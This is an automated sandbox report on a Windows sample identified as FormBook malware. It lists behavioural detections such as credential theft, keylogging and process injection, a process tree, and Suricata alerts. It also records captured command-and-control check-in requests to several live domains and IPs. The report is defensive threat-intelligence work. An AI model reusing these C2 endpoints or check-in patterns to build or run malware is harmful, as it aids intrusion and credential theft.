Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01152-11-12-24.exe

Overview

General Information

Sample name:01152-11-12-24.exe
Analysis ID:1573117
MD5:be474451d52ccc6038809f5308effb59
SHA1:0caf3ee11e31cc873aa5086ae58a8b0b90cf94b3
SHA256:c277a0bbd4efe9b14a4c880ac91b1ab7d0769ad013e67079bad402f56e260a60
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 01152-11-12-24.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\01152-11-12-24.exe" MD5: BE474451D52CCC6038809F5308EFFB59)
    • svchost.exe (PID: 7668 cmdline: "C:\Users\user\Desktop\01152-11-12-24.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hKAQraLbCUKXj.exe (PID: 6664 cmdline: "C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 8064 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • hKAQraLbCUKXj.exe (PID: 4508 cmdline: "C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5096 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ParentImage: C:\Users\user\Desktop\01152-11-12-24.exe, ParentProcessId: 7256, ParentProcessName: 01152-11-12-24.exe, ProcessCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ProcessId: 7668, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ParentImage: C:\Users\user\Desktop\01152-11-12-24.exe, ParentProcessId: 7256, ParentProcessName: 01152-11-12-24.exe, ProcessCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ProcessId: 7668, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-11T15:03:50.512729+010028554641A Network Trojan was detected192.168.2.749859217.160.0.11380TCP
                2024-12-11T15:03:53.179664+010028554641A Network Trojan was detected192.168.2.749868217.160.0.11380TCP
                2024-12-11T15:03:55.942073+010028554641A Network Trojan was detected192.168.2.749874217.160.0.11380TCP
                2024-12-11T15:04:14.656907+010028554641A Network Trojan was detected192.168.2.749916154.90.58.20980TCP
                2024-12-11T15:04:17.313122+010028554641A Network Trojan was detected192.168.2.749926154.90.58.20980TCP
                2024-12-11T15:04:19.984922+010028554641A Network Trojan was detected192.168.2.749933154.90.58.20980TCP
                2024-12-11T15:04:29.984933+010028554641A Network Trojan was detected192.168.2.74995538.181.21.17880TCP
                2024-12-11T15:04:32.641240+010028554641A Network Trojan was detected192.168.2.74996438.181.21.17880TCP
                2024-12-11T15:04:35.297492+010028554641A Network Trojan was detected192.168.2.74997238.181.21.17880TCP
                2024-12-11T15:04:53.733644+010028554641A Network Trojan was detected192.168.2.74998423.167.152.4180TCP
                2024-12-11T15:04:56.561078+010028554641A Network Trojan was detected192.168.2.74998523.167.152.4180TCP
                2024-12-11T15:04:59.205755+010028554641A Network Trojan was detected192.168.2.74998623.167.152.4180TCP
                2024-12-11T15:05:10.266493+010028554641A Network Trojan was detected192.168.2.749988103.75.185.2280TCP
                2024-12-11T15:05:12.922549+010028554641A Network Trojan was detected192.168.2.749989103.75.185.2280TCP
                2024-12-11T15:05:15.578838+010028554641A Network Trojan was detected192.168.2.749990103.75.185.2280TCP
                2024-12-11T15:05:25.110598+010028554641A Network Trojan was detected192.168.2.749992162.0.213.9480TCP
                2024-12-11T15:05:27.755607+010028554641A Network Trojan was detected192.168.2.749993162.0.213.9480TCP
                2024-12-11T15:05:30.482484+010028554641A Network Trojan was detected192.168.2.749994162.0.213.9480TCP
                2024-12-11T15:05:40.825659+010028554641A Network Trojan was detected192.168.2.749996161.97.168.24580TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.44ynh.top/l9wb/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: 01152-11-12-24.exeReversingLabs: Detection: 44%
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 01152-11-12-24.exeJoe Sandbox ML: detected
                Source: 01152-11-12-24.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: tzutil.pdbGCTL source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hKAQraLbCUKXj.exe, 0000000A.00000002.3114857736.000000000076E000.00000002.00000001.01000000.00000005.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790005654.000000000076E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0095445A
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095C6D1 FindFirstFileW,FindClose,0_2_0095C6D1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0095C75C
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095EF95
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095F0F2
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0095F3F3
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009537EF
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00953B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00953B12
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0095BCBC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030AC8A0 FindFirstFileW,FindNextFileW,FindClose,11_2_030AC8A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax11_2_03099EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h11_2_036D04CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49874 -> 217.160.0.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49859 -> 217.160.0.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49926 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49955 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49964 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 217.160.0.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49916 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49933 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 162.0.213.94:80
                Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
                Source: Joe Sandbox ViewIP Address: 217.160.0.113 217.160.0.113
                Source: Joe Sandbox ViewIP Address: 23.167.152.41 23.167.152.41
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009622EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009622EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Wed, 11 Dec 2024 14:04:14 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Wed, 11 Dec 2024 14:04:17 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: GET /q3v1/?rLx0p=06jDTp00Q&9rKHjDxP=fC5DX2ZaB+U22tqYS+31DCM0Vrm4Elo0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfcmXJHPof67iEk5v1Y4XZGEVpYnTZiVigeHb+dSitYw1T+PjPtStOlFWH8 HTTP/1.1Host: www.supernutra01.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /m5si/?9rKHjDxP=eqY3hh7t27bJ5LQcNwCEIywmzarZF02UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcn2k/dwiDu7fbQ4+QluVQl8FQgs02h3ek4MsPNmfC+au8Zmg3P0HGq0iPg&rLx0p=06jDTp00Q HTTP/1.1Host: www.prestigerugz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /521z/?9rKHjDxP=Yx3A360WU89Z0GGKhcjTsfSOrSBN5i2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/G2BSEq3A6jonlAGxKbazJEUegoNulYJrFScZeGEO6SiohwMlB95u5jWi&rLx0p=06jDTp00Q HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /l9wb/?9rKHjDxP=dKoVDaTSZmwFjIfkW8eCOVVdW49NdaF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvxumUtdp8gpSZ+pYO0AiTerbcUhpiZvFAaWm7Nt0Fw8mr3zjcUwdfloZd&rLx0p=06jDTp00Q HTTP/1.1Host: www.44ynh.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /q34f/?9rKHjDxP=dUs1zx3MtgRbplDUvpUvYjuAQD0vmGuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9erFxSPIl4knKdLfgwmO1oEe1lTFw6B1+2EJs+fQO6G9vPzlr5NjlOo8Ha&rLx0p=06jDTp00Q HTTP/1.1Host: www.75178.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /syud/?9rKHjDxP=gwko4eFZldhJcfMpXUu8nEIrrsK3aSdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVZSHwmSCiW0eRqUFBT2gRXL1+O05pXEJ5/rwABmaKZBakYxfHeQS7sPZ1&rLx0p=06jDTp00Q HTTP/1.1Host: www.taxitayninh365.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /wr6c/?9rKHjDxP=P2ZEIELZ0UPa04kV9W8ohJ98vIa20Z9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLluv5rxVbcwMo5N3ddLCq6QLz9p/hlfUxJPhq7oCzYOhUfK96Ibl0PndwU&rLx0p=06jDTp00Q HTTP/1.1Host: www.ontherise.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: global trafficDNS traffic detected: DNS query: www.prestigerugz.info
                Source: global trafficDNS traffic detected: DNS query: www.buckser.info
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.44ynh.top
                Source: global trafficDNS traffic detected: DNS query: www.setwayidiomas.online
                Source: global trafficDNS traffic detected: DNS query: www.75178.club
                Source: global trafficDNS traffic detected: DNS query: www.taxitayninh365.site
                Source: global trafficDNS traffic detected: DNS query: www.ontherise.top
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
